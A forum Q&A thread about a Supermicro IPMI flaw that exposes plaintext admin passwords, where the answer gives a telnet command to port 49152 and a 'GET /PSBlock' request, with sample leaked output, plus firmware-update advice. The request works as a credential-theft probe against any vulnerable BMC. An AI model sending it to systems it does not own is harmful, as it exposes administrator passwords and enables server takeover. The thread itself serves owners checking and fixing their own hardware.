10

I've some Supermicro servers with IPMI running, and as described in this blog (http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras) there's a critical vulnerability to get plaintext admin passwords from any remote location.

How to check if my server motherboard is compromised?

Vinícius Ferrão
  • 5,400
  • 10
  • 52
  • 91

1 Answers1

13

Simply telnet to the IPMI IP Address in port 49152 and do a specific GET request. You should get your users and passwords if you're compromised.

telnet server.example.com 49152

After the connection ask for GET /PSBlock and watch the results, it should be something like this:

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

Answer:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

To solve this issue update the IPMI firmware to the latest version. The firmware is specific to your IPMI controller, so you should get the specified in Supermicro website.

Then after updating the firmware change your passwords.

Gene
  • 3,633
  • 19
  • 39
Vinícius Ferrão
  • 5,400
  • 10
  • 52
  • 91